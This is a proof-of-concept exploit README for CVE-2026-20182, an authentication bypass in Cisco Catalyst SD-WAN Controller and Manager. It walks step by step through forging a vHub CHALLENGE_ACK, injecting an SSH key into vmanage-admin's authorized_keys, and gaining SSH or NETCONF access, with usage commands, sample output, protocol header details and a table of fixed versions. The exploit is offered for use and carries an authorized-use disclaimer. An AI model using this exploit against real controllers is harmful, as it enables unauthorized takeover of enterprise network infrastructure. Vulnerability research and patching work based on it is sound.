Share
## https://sploitus.com/exploit?id=13DF22F3-E9C6-58EE-B458-EB585C4D715D
# CVE-2026-20182 โ€” Cisco Catalyst SD-WAN Controller / Manager Authentication Bypass

A proof-of-concept exploit for **CVE-2026-20182**, a critical (CVSS 10.0) authentication bypass in the vdaemon DTLS service (UDP/12346) on Cisco Catalyst SD-WAN Controller (vSmart) and Manager (vManage).

**Disclosed:** May 14, 2026 by Rapid7 (Stephen Fewer & Jonah Burgess)  
**CISA KEV:** Added May 14, 2026 (Emergency Directive 26-03)  
**CVSS:** 10.0 โ€” CWE-287: Improper Authentication

## Vulnerability

The vdaemon service uses a multi-phase DTLS handshake to authenticate control-plane peers. The `vbond_proc_challenge_ack()` function implements device-type-specific certificate verification โ€” but device type 2 (vHub) has **no verification code path**. Sending a CHALLENGE_ACK with `device_type=2` causes the function to fall through every conditional and unconditionally set `peer->authenticated = 1`.

No valid credentials, no CA-signed certificate, and no knowledge of the SD-WAN deployment are required.

## What the Exploit Does

1. Establishes a DTLS 1.2 connection to the target's vdaemon service (UDP/12346)
2. Receives the CHALLENGE message (msg_type=8)
3. Sends CHALLENGE_ACK claiming to be a **vHub** (device_type=2) โ†’ peer is marked authenticated
4. Sends HELLO (msg_type=5) โ†’ peer transitions to UP state
5. Injects an SSH public key into `/home/vmanage-admin/.ssh/authorized_keys` via `MSG_VMANAGE_TO_PEER` (msg_type=14)
6. Grants NETCONF access (SSH TCP/830) or SSH access (TCP/22) as `vmanage-admin`

## Usage

```bash
python3 cve-2026-20182.py -t  [options]
```

### Options

| Argument | Description |
|----------|-------------|
| `-t`, `--target` | Target IP or hostname |
| `--port` | vdaemon UDP port (default: 12346) |
| `--key-file` | Path to an existing SSH public key to inject (optional) |
| `--netconf` | Verify exploitation by connecting to NETCONF via SSH |

### Examples

```bash
# Generate a fresh key pair and exploit
python3 cve-2026-20182.py -t 192.168.1.100

# Use an existing public key
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub

# Exploit and verify via NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf
```

### Output

```
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...

[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 vmanage-admin@192.168.1.100
[+] SSH:     ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa vmanage-admin@192.168.1.100
```

## Affected Versions

| Release | Fixed Version |
|---------|---------------|
| < 20.9 | Migrate to supported release |
| 20.9 | 20.9.9.1 |
| 20.10 | 20.12.7.1 |
| 20.11 | 20.12.7.1 |
| 20.12 | 20.12.5.4 / 20.12.6.2 / 20.12.7.1 |
| 20.13 | 20.15.5.2 |
| 20.14 | 20.15.5.2 |
| 20.15 | 20.15.4.4 / 20.15.5.2 |
| 20.16 | 20.18.2.2 |
| 20.18 | 20.18.2.2 |
| 26.1.1 | 26.1.1.1 |

## Research References

- **Rapid7 (Original Disclosure):** [CVE-2026-20182: Critical authentication bypass in Cisco Catalyst SD-WAN Controller](https://www.rapid7.com/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed/) โ€” Full technical analysis, decompiled code, and protocol details by Stephen Fewer & Jonah Burgess
- **Cisco Security Advisory:** [cisco-sa-sdwan-rpa2-v69WY2SW](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW) โ€” Vendor advisory with fixed versions
- **CISA KEV:** [CVE-2026-20182](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) โ€” Emergency Directive 26-03 (remediation by May 17, 2026)
- **NVD:** [CVE-2026-20182](https://nvd.nist.gov/vuln/detail/CVE-2026-20182) โ€” National Vulnerability Database entry
- **Rapid7 Metasploit Module:** `cisco_sdwan_vhub_auth_bypass` โ€” Auxiliary module in Metasploit framework
- **BleepingComputer:** [Cisco warns of new critical SD-WAN flaw exploited in zero-day attacks](https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-critical-sd-wan-flaw-exploited-in-zero-day-attacks/)
- **Tenable:** [FAQ about the continued exploitation of Cisco SD-WAN vulnerabilities](https://www.tenable.com/blog/faq-about-the-continued-exploitation-of-cisco-catalyst-sd-wan-vulnerabilities-uat-8616)
- **Cisco Talos:** Threat actor UAT-8616 attributed to exploiting this vulnerability in the wild

## Technical Details

The vdaemon protocol header is 12 bytes:

| Offset | Size | Field | Notes |
|--------|------|-------|-------|
| 0 | 1 | msg_type | Low nibble = type, high nibble = version |
| 1 | 1 | device_info | High nibble = device_type, low nibble = flags |
| 2 | 1 | flags | Standard value 0xA0 |
| 3 | 1 | padding | Always 0x00 |
| 4-7 | 4 | domain_id | Big-endian uint32 |
| 8-11 | 4 | site_id | Big-endian uint32 |

Device types: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage

## Requirements

- Python 3.7+
- `openssl` CLI (for DTLS transport)
- `cryptography` library (`pip install cryptography`)

## Disclaimer

This exploit is intended solely for authorized red team operations, penetration testing, and security research on systems where you have explicit written permission. Unauthorized use is illegal.